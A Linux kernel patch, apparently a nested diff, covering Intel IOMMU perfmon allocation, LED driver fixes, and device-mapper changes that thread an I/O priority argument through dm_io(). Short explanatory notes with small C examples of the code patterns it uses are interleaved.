++	for (i = 0; i < iommu_pmu->num_eg; i++) {
++		u64 pcap;
++
++		pcap = dmar_readq(iommu->reg + DMAR_PERFEVNTCAP_REG +
++				  i * IOMMU_PMU_CAP_REGS_STEP);
++		iommu_pmu->evcap[i] = pecap_es(pcap);
++	}
++
++	iommu_pmu->cntr_evcap = kcalloc(iommu_pmu->num_cntr, sizeof(u32 *), GFP_KERNEL);
++	if (!iommu_pmu->cntr_evcap) {
++		ret = -ENOMEM;
++		goto free_pmu_evcap;
++	}
++	for (i = 0; i < iommu_pmu->num_cntr; i++) {
++		iommu_pmu->cntr_evcap[i] = kcalloc(iommu_pmu->num_eg, sizeof(u32), GFP_KERNEL);
++		if (!iommu_pmu->cntr_evcap[i]) {
++			ret = -ENOMEM;
++			goto free_pmu_cntr_evcap;
++		}
++		/*
++		 * Set to the global capabilities, will adjust according
++		 * to per-counter capabilities later.
++		 */
++		for (j = 0; j < iommu_pmu->num_eg; j++)
++			iommu_pmu->cntr_evcap[i][j] = (u32)iommu_pmu->evcap[j];
++	}
++
++	iommu_pmu->cfg_reg = get_perf_reg_address(iommu, DMAR_PERFCFGOFF_REG);
++	iommu_pmu->cntr_reg = get_perf_reg_address(iommu, DMAR_PERFCNTROFF_REG);
++	iommu_pmu->overflow = get_perf_reg_address(iommu, DMAR_PERFOVFOFF_REG);
++
++	/*
++	 * Check per-counter capabilities. All counters should have the
++	 * same capabilities on Interrupt on Overflow Support and Counter
++	 * Width.
++	 */
++	for (i = 0; i < iommu_pmu->num_cntr; i++) {
++		cap = dmar_readl(iommu_pmu->cfg_reg +
++				 i * IOMMU_PMU_CFG_OFFSET +
++				 IOMMU_PMU_CFG_CNTRCAP_OFFSET);
++		if (!iommu_cntrcap_pcc(cap))
++			continue;
++
++		/*
++		 * It's possible that some counters have a different
++		 * capability because of, e.g., a HW bug. Check the corner
++		 * case here and simply drop those counters.
++		 */
++		if ((iommu_cntrcap_cw(cap) != iommu_pmu->cntr_width) ||
++		    !iommu_cntrcap_ios(cap)) {
++			iommu_pmu->num_cntr = i;
++			pr_warn("PMU counter capability inconsistent, counter number reduced to %d\n",
++				iommu_pmu->num_cntr);
++		}
++
++		/* Clear the pre-defined events group */
++		for (j = 0; j < iommu_pmu->num_eg; j++)
++			iommu_pmu->cntr_evcap[i][j] = 0;
++
++		/* Override with per-counter event capabilities */
++		for (j = 0; j < iommu_cntrcap_egcnt(cap); j++) {
++			cap = dmar_readl(iommu_pmu->cfg_reg + i * IOMMU_PMU_CFG_OFFSET +
++					 IOMMU_PMU_CFG_CNTREVCAP_OFFSET +
++					 (j * IOMMU_PMU_OFF_REGS_STEP));
++			iommu_pmu->cntr_evcap[i][iommu_event_group(cap)] = iommu_event_select(cap);
++			/*
++			 * Some events may only be supported by a specific counter.
++			 * Track them in the evcap as well.
++			 */
++			iommu_pmu->evcap[iommu_event_group(cap)] |= iommu_event_select(cap);
++		}
++	}
++
++	iommu_pmu->iommu = iommu;
++	iommu->pmu = iommu_pmu;
++
++	return 0;
++
++free_pmu_cntr_evcap:
++	for (i = 0; i < iommu_pmu->num_cntr; i++)
++		kfree(iommu_pmu->cntr_evcap[i]);
++	kfree(iommu_pmu->cntr_evcap);
++free_pmu_evcap:
++	kfree(iommu_pmu->evcap);
++free_pmu:
++	kfree(iommu_pmu);
++
++	return ret;
++}
++
++void free_iommu_pmu(struct intel_iommu *iommu)
++{
++	struct iommu_pmu *iommu_pmu = iommu->pmu;
++
++	if (!iommu_pmu)
++		return;
++
++	if (iommu_pmu->evcap) {
++		int i;
++
++		for (i = 0; i < iommu_pmu->num_cntr; i++)
++			kfree(iommu_pmu->cntr_evcap[i]);
++		kfree(iommu_pmu->cntr_evcap);
++	}
++	kfree(iommu_pmu->evcap);
++	kfree(iommu_pmu);
++	iommu->pmu = NULL;
++}
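
alloc_iommu_pmu() uses the kernel's standard goto-ladder unwind: each successful allocation adds one label of cleanup, and a failure jumps to the label that frees exactly what was allocated so far, in reverse order. The skeleton, with hypothetical structure members:

	struct thing { u32 *a; u32 *b; };

	static int alloc_example(struct thing **out)
	{
		struct thing *t;
		int ret;

		t = kzalloc(sizeof(*t), GFP_KERNEL);
		if (!t)
			return -ENOMEM;

		t->a = kcalloc(4, sizeof(*t->a), GFP_KERNEL);
		if (!t->a) {
			ret = -ENOMEM;
			goto free_t;
		}

		t->b = kcalloc(4, sizeof(*t->b), GFP_KERNEL);
		if (!t->b) {
			ret = -ENOMEM;
			goto free_a;	/* reverse order of allocation */
		}

		*out = t;
		return 0;

	free_a:
		kfree(t->a);
	free_t:
		kfree(t);
		return ret;
	}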
+diff --git a/drivers/iommu/intel/perfmon.h b/drivers/iommu/intel/perfmon.h
+new file mode 100644
+index 0000000000000..4b0d9c1fea6ff
+--- /dev/null
++++ b/drivers/iommu/intel/perfmon.h
+@@ -0,0 +1,40 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++
++/*
++ * PERFCFGOFF_REG, PERFFRZOFF_REG
++ * PERFOVFOFF_REG, PERFCNTROFF_REG
++ */
++#define IOMMU_PMU_NUM_OFF_REGS			4
++#define IOMMU_PMU_OFF_REGS_STEP			4
++
++#define IOMMU_PMU_CFG_OFFSET			0x100
++#define IOMMU_PMU_CFG_CNTRCAP_OFFSET		0x80
++#define IOMMU_PMU_CFG_CNTREVCAP_OFFSET		0x84
++#define IOMMU_PMU_CFG_SIZE			0x8
++#define IOMMU_PMU_CFG_FILTERS_OFFSET		0x4
++
++#define IOMMU_PMU_CAP_REGS_STEP			8
++
++#define iommu_cntrcap_pcc(p)			((p) & 0x1)
++#define iommu_cntrcap_cw(p)			(((p) >> 8) & 0xff)
++#define iommu_cntrcap_ios(p)			(((p) >> 16) & 0x1)
++#define iommu_cntrcap_egcnt(p)			(((p) >> 28) & 0xf)
++
++#define iommu_event_select(p)			((p) & 0xfffffff)
++#define iommu_event_group(p)			(((p) >> 28) & 0xf)
++
++#ifdef CONFIG_INTEL_IOMMU_PERF_EVENTS
++int alloc_iommu_pmu(struct intel_iommu *iommu);
++void free_iommu_pmu(struct intel_iommu *iommu);
++#else
++static inline int
++alloc_iommu_pmu(struct intel_iommu *iommu)
++{
++	return 0;
++}
++
++static inline void
++free_iommu_pmu(struct intel_iommu *iommu)
++{
++}
++#endif /* CONFIG_INTEL_IOMMU_PERF_EVENTS */
+diff --git a/drivers/iommu/irq_remapping.c b/drivers/iommu/irq_remapping.c
+index 83314b9d8f38b..ee59647c20501 100644
+--- a/drivers/iommu/irq_remapping.c
++++ b/drivers/iommu/irq_remapping.c
+@@ -99,7 +99,8 @@ int __init irq_remapping_prepare(void)
+ 	if (disable_irq_remap)
+ 		return -ENOSYS;
+ 
+-	if (intel_irq_remap_ops.prepare() == 0)
++	if (IS_ENABLED(CONFIG_INTEL_IOMMU) &&
++	    intel_irq_remap_ops.prepare() == 0)
+ 		remap_ops = &intel_irq_remap_ops;
+ 	else if (IS_ENABLED(CONFIG_AMD_IOMMU) &&
+ 		 amd_iommu_irq_ops.prepare() == 0)
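
The irq_remapping change leans on IS_ENABLED() folding to a compile-time constant: with CONFIG_INTEL_IOMMU=n the whole condition becomes 0, the call is never emitted, and intel_irq_remap_ops may remain a bare declaration without causing a link failure. The same trick in miniature, with an invented symbol:

	extern int optional_prepare(void);	/* built only when CONFIG_FOO=y */

	static void pick_backend(void)
	{
		/* Constant-folded: with CONFIG_FOO=n no call is generated. */
		if (IS_ENABLED(CONFIG_FOO) && optional_prepare() == 0)
			pr_info("optional backend selected\n");
	}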
+diff --git a/drivers/leds/flash/leds-sgm3140.c b/drivers/leds/flash/leds-sgm3140.c
+index d3a30ad94ac46..dd5d327c52a10 100644
+--- a/drivers/leds/flash/leds-sgm3140.c
++++ b/drivers/leds/flash/leds-sgm3140.c
+@@ -114,8 +114,11 @@ static int sgm3140_brightness_set(struct led_classdev *led_cdev,
+ 				"failed to enable regulator: %d\n", ret);
+ 			return ret;
+ 		}
++		gpiod_set_value_cansleep(priv->flash_gpio, 0);
+ 		gpiod_set_value_cansleep(priv->enable_gpio, 1);
+ 	} else {
++		del_timer_sync(&priv->powerdown_timer);
++		gpiod_set_value_cansleep(priv->flash_gpio, 0);
+ 		gpiod_set_value_cansleep(priv->enable_gpio, 0);
+ 		ret = regulator_disable(priv->vin_regulator);
+ 		if (ret) {
+diff --git a/drivers/leds/leds-aw2013.c b/drivers/leds/leds-aw2013.c
+index 0b52fc9097c6e..3c05958578a1c 100644
+--- a/drivers/leds/leds-aw2013.c
++++ b/drivers/leds/leds-aw2013.c
+@@ -397,6 +397,7 @@ static int aw2013_probe(struct i2c_client *client)
+ 	regulator_disable(chip->vcc_regulator);
+ 
+ error:
++	mutex_unlock(&chip->mutex);
+ 	mutex_destroy(&chip->mutex);
+ 	return ret;
+ }
+diff --git a/drivers/md/dm-bufio.c b/drivers/md/dm-bufio.c
+index 100a6a236d92a..ec662f97ba828 100644
+--- a/drivers/md/dm-bufio.c
++++ b/drivers/md/dm-bufio.c
+@@ -614,7 +614,7 @@ static void use_dmio(struct dm_buffer *b, enum req_op op, sector_t sector,
+ 		io_req.mem.ptr.vma = (char *)b->data + offset;
+ 	}
+ 
+-	r = dm_io(&io_req, 1, &region, NULL);
++	r = dm_io(&io_req, 1, &region, NULL, IOPRIO_DEFAULT);
+ 	if (unlikely(r))
+ 		b->end_io(b, errno_to_blk_status(r));
+ }
+@@ -1375,7 +1375,7 @@ int dm_bufio_issue_flush(struct dm_bufio_client *c)
+ 
+ 	BUG_ON(dm_bufio_in_request());
+ 
+-	return dm_io(&io_req, 1, &io_reg, NULL);
++	return dm_io(&io_req, 1, &io_reg, NULL, IOPRIO_DEFAULT);
+ }
+ EXPORT_SYMBOL_GPL(dm_bufio_issue_flush);
+ 
+@@ -1398,7 +1398,7 @@ int dm_bufio_issue_discard(struct dm_bufio_client *c, sector_t block, sector_t c
+ 
+ 	BUG_ON(dm_bufio_in_request());
+ 
+-	return dm_io(&io_req, 1, &io_reg, NULL);
++	return dm_io(&io_req, 1, &io_reg, NULL, IOPRIO_DEFAULT);
+ }
+ EXPORT_SYMBOL_GPL(dm_bufio_issue_discard);
+ 
+diff --git a/drivers/md/dm-cache-policy.h b/drivers/md/dm-cache-policy.h
+index 6ba3e9c91af53..8bc21d54884e9 100644
+--- a/drivers/md/dm-cache-policy.h
++++ b/drivers/md/dm-cache-policy.h
+@@ -75,7 +75,7 @@ struct dm_cache_policy {
+ 	 * background work.
+ 	 */
+ 	int (*get_background_work)(struct dm_cache_policy *p, bool idle,
+-			           struct policy_work **result);
++				   struct policy_work **result);
+ 
+ 	/*
+ 	 * You must pass in the same work pointer that you were given, not
+diff --git a/drivers/md/dm-crypt.c b/drivers/md/dm-crypt.c
+index 3e215aa85b99a..25e51dc6e5598 100644
+--- a/drivers/md/dm-crypt.c
++++ b/drivers/md/dm-crypt.c
+@@ -52,11 +52,11 @@
+ struct convert_context {
+ 	struct completion restart;
+ 	struct bio *bio_in;
+-	struct bio *bio_out;
+ 	struct bvec_iter iter_in;
++	struct bio *bio_out;
+ 	struct bvec_iter iter_out;
+-	u64 cc_sector;
+ 	atomic_t cc_pending;
++	u64 cc_sector;
+ 	union {
+ 		struct skcipher_request *req;
+ 		struct aead_request *req_aead;
+@@ -2535,7 +2535,7 @@ static int crypt_set_keyring_key(struct crypt_config *cc, const char *key_string
+ 		type = &key_type_encrypted;
+ 		set_key = set_key_encrypted;
+ 	} else if (IS_ENABLED(CONFIG_TRUSTED_KEYS) &&
+-	           !strncmp(key_string, "trusted:", key_desc - key_string + 1)) {
++		   !strncmp(key_string, "trusted:", key_desc - key_string + 1)) {
+ 		type = &key_type_trusted;
+ 		set_key = set_key_trusted;
+ 	} else {
+diff --git a/drivers/md/dm-integrity.c b/drivers/md/dm-integrity.c
+index 3da4359f51645..9c9e2b50c63c3 100644
+--- a/drivers/md/dm-integrity.c
++++ b/drivers/md/dm-integrity.c
+@@ -579,7 +579,7 @@ static int sync_rw_sb(struct dm_integrity_c *ic, blk_opf_t opf)
+ 		}
+ 	}
+ 
+-	r = dm_io(&io_req, 1, &io_loc, NULL);
++	r = dm_io(&io_req, 1, &io_loc, NULL, IOPRIO_DEFAULT);
+ 	if (unlikely(r))
+ 		return r;
+ 
+@@ -1089,7 +1089,7 @@ static void rw_journal_sectors(struct dm_integrity_c *ic, blk_opf_t opf,
+ 	io_loc.sector = ic->start + SB_SECTORS + sector;
+ 	io_loc.count = n_sectors;
+ 
+-	r = dm_io(&io_req, 1, &io_loc, NULL);
++	r = dm_io(&io_req, 1, &io_loc, NULL, IOPRIO_DEFAULT);
+ 	if (unlikely(r)) {
+ 		dm_integrity_io_error(ic, (opf & REQ_OP_MASK) == REQ_OP_READ ?
+ 				      "reading journal" : "writing journal", r);
+@@ -1205,7 +1205,7 @@ static void copy_from_journal(struct dm_integrity_c *ic, unsigned int section, u
+ 	io_loc.sector = target;
+ 	io_loc.count = n_sectors;
+ 
+-	r = dm_io(&io_req, 1, &io_loc, NULL);
++	r = dm_io(&io_req, 1, &io_loc, NULL, IOPRIO_DEFAULT);
+ 	if (unlikely(r)) {
+ 		WARN_ONCE(1, "asynchronous dm_io failed: %d", r);
+ 		fn(-1UL, data);
+@@ -1532,7 +1532,7 @@ static void dm_integrity_flush_buffers(struct dm_integrity_c *ic, bool flush_dat
+ 		fr.io_reg.count = 0,
+ 		fr.ic = ic;
+ 		init_completion(&fr.comp);
+-		r = dm_io(&fr.io_req, 1, &fr.io_reg, NULL);
++		r = dm_io(&fr.io_req, 1, &fr.io_reg, NULL, IOPRIO_DEFAULT);
+ 		BUG_ON(r);
+ 	}
+ 
+@@ -1709,7 +1709,6 @@ static noinline void integrity_recheck(struct dm_integrity_io *dio, char *checks
+ 	struct bio_vec bv;
+ 	sector_t sector, logical_sector, area, offset;
+ 	struct page *page;
+-	void *buffer;
+ 
+ 	get_area_and_offset(ic, dio->range.logical_sector, &area, &offset);
+ 	dio->metadata_block = get_metadata_sector_and_offset(ic, area, offset,
+@@ -1718,13 +1717,14 @@ static noinline void integrity_recheck(struct dm_integrity_io *dio, char *checks
+ 	logical_sector = dio->range.logical_sector;
+ 
+ 	page = mempool_alloc(&ic->recheck_pool, GFP_NOIO);
+-	buffer = page_to_virt(page);
+ 
+ 	__bio_for_each_segment(bv, bio, iter, dio->bio_details.bi_iter) {
+ 		unsigned pos = 0;
+ 
+ 		do {
++			sector_t alignment;
+ 			char *mem;
++			char *buffer = page_to_virt(page);
+ 			int r;
+ 			struct dm_io_request io_req;
+ 			struct dm_io_region io_loc;
+@@ -1737,7 +1737,15 @@ static noinline void integrity_recheck(struct dm_integrity_io *dio, char *checks
+ 			io_loc.sector = sector;
+ 			io_loc.count = ic->sectors_per_block;
+ 
+-			r = dm_io(&io_req, 1, &io_loc, NULL);
++			/* Align the bio to logical block size */
++			alignment = dio->range.logical_sector | bio_sectors(bio) | (PAGE_SIZE >> SECTOR_SHIFT);
++			alignment &= -alignment;
++			io_loc.sector = round_down(io_loc.sector, alignment);
++			io_loc.count += sector - io_loc.sector;
++			buffer += (sector - io_loc.sector) << SECTOR_SHIFT;
++			io_loc.count = round_up(io_loc.count, alignment);
++
++			r = dm_io(&io_req, 1, &io_loc, NULL, IOPRIO_DEFAULT);
+ 			if (unlikely(r)) {
+ 				dio->bi_status = errno_to_blk_status(r);
+ 				goto free_ret;
+@@ -1856,12 +1864,12 @@ static void integrity_metadata(struct work_struct *w)
+ 			r = dm_integrity_rw_tag(ic, checksums, &dio->metadata_block, &dio->metadata_offset,
+ 						checksums_ptr - checksums, dio->op == REQ_OP_READ ? TAG_CMP : TAG_WRITE);
+ 			if (unlikely(r)) {
++				if (likely(checksums != checksums_onstack))
++					kfree(checksums);
+ 				if (r > 0) {
+-					integrity_recheck(dio, checksums);
++					integrity_recheck(dio, checksums_onstack);
+ 					goto skip_io;
+ 				}
+-				if (likely(checksums != checksums_onstack))
+-					kfree(checksums);
+ 				goto error;
+ 			}
+ 
+@@ -2367,7 +2375,6 @@ static void dm_integrity_map_continue(struct dm_integrity_io *dio, bool from_map
+ 		else
+ skip_check:
+ 			dec_in_flight(dio);
+-
+ 	} else {
+ 		INIT_WORK(&dio->work, integrity_metadata);
+ 		queue_work(ic->metadata_wq, &dio->work);
+@@ -2775,7 +2782,7 @@ static void integrity_recalc(struct work_struct *w)
+ 	io_loc.sector = get_data_sector(ic, area, offset);
+ 	io_loc.count = n_sectors;
+ 
+-	r = dm_io(&io_req, 1, &io_loc, NULL);
++	r = dm_io(&io_req, 1, &io_loc, NULL, IOPRIO_DEFAULT);
+ 	if (unlikely(r)) {
+ 		dm_integrity_io_error(ic, "reading data", r);
+ 		goto err;
+@@ -4151,7 +4158,7 @@ static int dm_integrity_ctr(struct dm_target *ti, unsigned int argc, char **argv
+ 		} else if (sscanf(opt_string, "block_size:%u%c", &val, &dummy) == 1) {
+ 			if (val < 1 << SECTOR_SHIFT ||
+ 			    val > MAX_SECTORS_PER_BLOCK << SECTOR_SHIFT ||
+-			    (val & (val -1))) {
++			    (val & (val - 1))) {
+ 				r = -EINVAL;
+ 				ti->error = "Invalid block_size argument";
+ 				goto bad;
+@@ -4477,7 +4484,7 @@ static int dm_integrity_ctr(struct dm_target *ti, unsigned int argc, char **argv
+ 	if (ic->internal_hash) {
+ 		size_t recalc_tags_size;
+ 		ic->recalc_wq = alloc_workqueue("dm-integrity-recalc", WQ_MEM_RECLAIM, 1);
+-		if (!ic->recalc_wq ) {
++		if (!ic->recalc_wq) {
+ 			ti->error = "Cannot allocate workqueue";
+ 			r = -ENOMEM;
+ 			goto bad;
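
The alignment computation added to integrity_recheck() above is a bit trick worth spelling out: OR-ing the starting sector, the bio size, and the page size (in sectors) and isolating the lowest set bit yields the largest power of two that divides all three, which is then used to round the I/O region down/up to a granularity the underlying device accepts. A minimal user-space sketch with illustrative values:

	#include <stdint.h>
	#include <stdio.h>

	/* Largest power of two dividing a, b and c: lowest set bit of their OR. */
	static uint64_t common_pow2(uint64_t a, uint64_t b, uint64_t c)
	{
		uint64_t v = a | b | c;

		return v & -v;
	}

	int main(void)
	{
		/* e.g. logical_sector = 24, bio_sectors = 16, PAGE_SIZE >> 9 = 8 */
		printf("%llu\n", (unsigned long long)common_pow2(24, 16, 8)); /* 8 */
		return 0;
	}
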
+diff --git a/drivers/md/dm-io.c b/drivers/md/dm-io.c
+index e488b05e35fa3..ec97658387c39 100644
+--- a/drivers/md/dm-io.c
++++ b/drivers/md/dm-io.c
+@@ -295,7 +295,7 @@ static void km_dp_init(struct dpages *dp, void *data)
+  *---------------------------------------------------------------*/
+ static void do_region(const blk_opf_t opf, unsigned int region,
+ 		      struct dm_io_region *where, struct dpages *dp,
+-		      struct io *io)
++		      struct io *io, unsigned short ioprio)
+ {
+ 	struct bio *bio;
+ 	struct page *page;
+@@ -344,6 +344,7 @@ static void do_region(const blk_opf_t opf, unsigned int region,
+ 				       &io->client->bios);
+ 		bio->bi_iter.bi_sector = where->sector + (where->count - remaining);
+ 		bio->bi_end_io = endio;
++		bio->bi_ioprio = ioprio;
+ 		store_io_and_region_in_bio(bio, io, region);
+ 
+ 		if (op == REQ_OP_DISCARD || op == REQ_OP_WRITE_ZEROES) {
+@@ -371,7 +372,7 @@ static void do_region(const blk_opf_t opf, unsigned int region,
+ 
+ static void dispatch_io(blk_opf_t opf, unsigned int num_regions,
+ 			struct dm_io_region *where, struct dpages *dp,
+-			struct io *io, int sync)
++			struct io *io, int sync, unsigned short ioprio)
+ {
+ 	int i;
+ 	struct dpages old_pages = *dp;
+@@ -388,7 +389,7 @@ static void dispatch_io(blk_opf_t opf, unsigned int num_regions,
+ 	for (i = 0; i < num_regions; i++) {
+ 		*dp = old_pages;
+ 		if (where[i].count || (opf & REQ_PREFLUSH))
+-			do_region(opf, i, where + i, dp, io);
++			do_region(opf, i, where + i, dp, io, ioprio);
+ 	}
+ 
+ 	/*
+@@ -413,7 +414,7 @@ static void sync_io_complete(unsigned long error, void *context)
+ 
+ static int sync_io(struct dm_io_client *client, unsigned int num_regions,
+ 		   struct dm_io_region *where, blk_opf_t opf, struct dpages *dp,
+-		   unsigned long *error_bits)
++		   unsigned long *error_bits, unsigned short ioprio)
+ {
+ 	struct io *io;
+ 	struct sync_io sio;
+@@ -435,7 +436,7 @@ static int sync_io(struct dm_io_client *client, unsigned int num_regions,
+ 	io->vma_invalidate_address = dp->vma_invalidate_address;
+ 	io->vma_invalidate_size = dp->vma_invalidate_size;
+ 
+-	dispatch_io(opf, num_regions, where, dp, io, 1);
++	dispatch_io(opf, num_regions, where, dp, io, 1, ioprio);
+ 
+ 	wait_for_completion_io(&sio.wait);
+ 
+@@ -447,7 +448,8 @@ static int sync_io(struct dm_io_client *client, unsigned int num_regions,
+ 
+ static int async_io(struct dm_io_client *client, unsigned int num_regions,
+ 		    struct dm_io_region *where, blk_opf_t opf,
+-		    struct dpages *dp, io_notify_fn fn, void *context)
++		    struct dpages *dp, io_notify_fn fn, void *context,
++		    unsigned short ioprio)
+ {
+ 	struct io *io;
+ 
+@@ -467,7 +469,7 @@ static int async_io(struct dm_io_client *client, unsigned int num_regions,
+ 	io->vma_invalidate_address = dp->vma_invalidate_address;
+ 	io->vma_invalidate_size = dp->vma_invalidate_size;
+ 
+-	dispatch_io(opf, num_regions, where, dp, io, 0);
++	dispatch_io(opf, num_regions, where, dp, io, 0, ioprio);
+ 	return 0;
+ }
+ 
+@@ -509,7 +511,8 @@ static int dp_init(struct dm_io_request *io_req, struct dpages *dp,
+ }
+ 
+ int dm_io(struct dm_io_request *io_req, unsigned int num_regions,
+-	  struct dm_io_region *where, unsigned long *sync_error_bits)
++	  struct dm_io_region *where, unsigned long *sync_error_bits,
++	  unsigned short ioprio)
+ {
+ 	int r;
+ 	struct dpages dp;
+@@ -520,11 +523,11 @@ int dm_io(struct dm_io_request *io_req, unsigned int num_regions,
+ 
+ 	if (!io_req->notify.fn)
+ 		return sync_io(io_req->client, num_regions, where,
+-			       io_req->bi_opf, &dp, sync_error_bits);
++			       io_req->bi_opf, &dp, sync_error_bits, ioprio);
+ 
+ 	return async_io(io_req->client, num_regions, where,
+ 			io_req->bi_opf, &dp, io_req->notify.fn,
+-			io_req->notify.context);
++			io_req->notify.context, ioprio);
+ }
+ EXPORT_SYMBOL(dm_io);
+ 
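
With the dm-io hunks above, every dm_io() caller now states an I/O priority explicitly, and do_region() stamps it on each bio it builds. Every caller converted in this patch passes IOPRIO_DEFAULT, so behaviour is unchanged; the plumbing exists so later changes can pass something else. A hedged sketch of a caller (the idle-class variant is hypothetical and not part of this patch):

	struct dm_io_request io_req = {
		.bi_opf = REQ_OP_READ,
		.mem.type = DM_IO_KMEM,
		.mem.ptr.addr = buffer,
		.client = client,
	};
	struct dm_io_region region = {
		.bdev = bdev,
		.sector = sector,
		.count = count,
	};

	/* unchanged behaviour: the priority the old 4-argument call implied */
	r = dm_io(&io_req, 1, &region, NULL, IOPRIO_DEFAULT);

	/* hypothetical: background work could run at idle priority instead */
	r = dm_io(&io_req, 1, &region, NULL,
		  IOPRIO_PRIO_VALUE(IOPRIO_CLASS_IDLE, 0));
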
+diff --git a/drivers/md/dm-kcopyd.c b/drivers/md/dm-kcopyd.c
+index 0ef78e56aa88c..fda51bd140ed3 100644
+--- a/drivers/md/dm-kcopyd.c
++++ b/drivers/md/dm-kcopyd.c
+@@ -572,9 +572,9 @@ static int run_io_job(struct kcopyd_job *job)
+ 	io_job_start(job->kc->throttle);
+ 
+ 	if (job->op == REQ_OP_READ)
+-		r = dm_io(&io_req, 1, &job->source, NULL);
++		r = dm_io(&io_req, 1, &job->source, NULL, IOPRIO_DEFAULT);
+ 	else
+-		r = dm_io(&io_req, job->num_dests, job->dests, NULL);
++		r = dm_io(&io_req, job->num_dests, job->dests, NULL, IOPRIO_DEFAULT);
+ 
+ 	return r;
+ }
+diff --git a/drivers/md/dm-log.c b/drivers/md/dm-log.c
+index 05141eea18d3c..da77878cb2c02 100644
+--- a/drivers/md/dm-log.c
++++ b/drivers/md/dm-log.c
+@@ -295,7 +295,7 @@ static int rw_header(struct log_c *lc, enum req_op op)
+ {
+ 	lc->io_req.bi_opf = op;
+ 
+-	return dm_io(&lc->io_req, 1, &lc->header_location, NULL);
++	return dm_io(&lc->io_req, 1, &lc->header_location, NULL, IOPRIO_DEFAULT);
+ }
+ 
+ static int flush_header(struct log_c *lc)
+@@ -308,7 +308,7 @@ static int flush_header(struct log_c *lc)
+ 
+ 	lc->io_req.bi_opf = REQ_OP_WRITE | REQ_PREFLUSH;
+ 
+-	return dm_io(&lc->io_req, 1, &null_location, NULL);
++	return dm_io(&lc->io_req, 1, &null_location, NULL, IOPRIO_DEFAULT);
+ }
+ 
+ static int read_header(struct log_c *log)
+@@ -756,8 +756,8 @@ static void core_set_region_sync(struct dm_dirty_log *log, region_t region,
+ 	log_clear_bit(lc, lc->recovering_bits, region);
+ 	if (in_sync) {
+ 		log_set_bit(lc, lc->sync_bits, region);
+-                lc->sync_count++;
+-        } else if (log_test_bit(lc->sync_bits, region)) {
++		lc->sync_count++;
++	} else if (log_test_bit(lc->sync_bits, region)) {
+ 		lc->sync_count--;
+ 		log_clear_bit(lc, lc->sync_bits, region);
+ 	}
+@@ -765,9 +765,9 @@ static void core_set_region_sync(struct dm_dirty_log *log, region_t region,
+ 
+ static region_t core_get_sync_count(struct dm_dirty_log *log)
+ {
+-        struct log_c *lc = (struct log_c *) log->context;
++	struct log_c *lc = (struct log_c *) log->context;
+ 
+-        return lc->sync_count;
++	return lc->sync_count;
+ }
+ 
+ #define	DMEMIT_SYNC \
+diff --git a/drivers/md/dm-raid.c b/drivers/md/dm-raid.c
+index 4b7528dc2fd08..bf833ca880bc1 100644
+--- a/drivers/md/dm-raid.c
++++ b/drivers/md/dm-raid.c
+@@ -362,8 +362,8 @@ static struct {
+ 	const int mode;
+ 	const char *param;
+ } _raid456_journal_mode[] = {
+-	{ R5C_JOURNAL_MODE_WRITE_THROUGH , "writethrough" },
+-	{ R5C_JOURNAL_MODE_WRITE_BACK    , "writeback" }
++	{ R5C_JOURNAL_MODE_WRITE_THROUGH, "writethrough" },
++	{ R5C_JOURNAL_MODE_WRITE_BACK,    "writeback" }
+ };
+ 
+ /* Return MD raid4/5/6 journal mode for dm @journal_mode one */
+@@ -1114,7 +1114,7 @@ static int validate_raid_redundancy(struct raid_set *rs)
+  *    [stripe_cache <sectors>]		Stripe cache size for higher RAIDs
+  *    [region_size <sectors>]		Defines granularity of bitmap
+  *    [journal_dev <dev>]		raid4/5/6 journaling deviice
+- *    					(i.e. write hole closing log)
++ *					(i.e. write hole closing log)
+  *
+  * RAID10-only options:
+  *    [raid10_copies <# copies>]	Number of copies.  (Default: 2)
+@@ -3325,14 +3325,14 @@ static int raid_map(struct dm_target *ti, struct bio *bio)
+ 	struct mddev *mddev = &rs->md;
+ 
+ 	/*
+-	 * If we're reshaping to add disk(s)), ti->len and
++	 * If we're reshaping to add disk(s), ti->len and
+ 	 * mddev->array_sectors will differ during the process
+ 	 * (ti->len > mddev->array_sectors), so we have to requeue
+ 	 * bios with addresses > mddev->array_sectors here or
+ 	 * there will occur accesses past EOD of the component
+ 	 * data images thus erroring the raid set.
+ 	 */
+-	if (unlikely(bio_end_sector(bio) > mddev->array_sectors))
++	if (unlikely(bio_has_data(bio) && bio_end_sector(bio) > mddev->array_sectors))
+ 		return DM_MAPIO_REQUEUE;
+ 
+ 	md_handle_request(mddev, bio);
+@@ -3999,7 +3999,7 @@ static int raid_preresume(struct dm_target *ti)
+ 	}
+ 
+ 	/* Resize bitmap to adjust to changed region size (aka MD bitmap chunksize) or grown device size */
+-        if (test_bit(RT_FLAG_RS_BITMAP_LOADED, &rs->runtime_flags) && mddev->bitmap &&
++	if (test_bit(RT_FLAG_RS_BITMAP_LOADED, &rs->runtime_flags) && mddev->bitmap &&
+ 	    (test_bit(RT_FLAG_RS_GROW, &rs->runtime_flags) ||
+ 	     (rs->requested_bitmap_chunk_sectors &&
+ 	       mddev->bitmap_info.chunksize != to_bytes(rs->requested_bitmap_chunk_sectors)))) {
+diff --git a/drivers/md/dm-raid1.c b/drivers/md/dm-raid1.c
+index c38e63706d911..1004199ae77ac 100644
+--- a/drivers/md/dm-raid1.c
++++ b/drivers/md/dm-raid1.c
+@@ -273,7 +273,7 @@ static int mirror_flush(struct dm_target *ti)
+ 	}
+ 
+ 	error_bits = -1;
+-	dm_io(&io_req, ms->nr_mirrors, io, &error_bits);
++	dm_io(&io_req, ms->nr_mirrors, io, &error_bits, IOPRIO_DEFAULT);
+ 	if (unlikely(error_bits != 0)) {
+ 		for (i = 0; i < ms->nr_mirrors; i++)
+ 			if (test_bit(i, &error_bits))
+@@ -543,7 +543,7 @@ static void read_async_bio(struct mirror *m, struct bio *bio)
+ 
+ 	map_region(&io, m, bio);
+ 	bio_set_m(bio, m);
+-	BUG_ON(dm_io(&io_req, 1, &io, NULL));
++	BUG_ON(dm_io(&io_req, 1, &io, NULL, IOPRIO_DEFAULT));
+ }
+ 
+ static inline int region_in_sync(struct mirror_set *ms, region_t region,
+@@ -670,7 +670,7 @@ static void do_write(struct mirror_set *ms, struct bio *bio)
+ 	 */
+ 	bio_set_m(bio, get_default_mirror(ms));
+ 
+-	BUG_ON(dm_io(&io_req, ms->nr_mirrors, io, NULL));
++	BUG_ON(dm_io(&io_req, ms->nr_mirrors, io, NULL, IOPRIO_DEFAULT));
+ }
+ 
+ static void do_writes(struct mirror_set *ms, struct bio_list *writes)
+@@ -902,7 +902,7 @@ static struct mirror_set *alloc_context(unsigned int nr_mirrors,
+ 	if (IS_ERR(ms->io_client)) {
+ 		ti->error = "Error creating dm_io client";
+ 		kfree(ms);
+- 		return NULL;
++		return NULL;
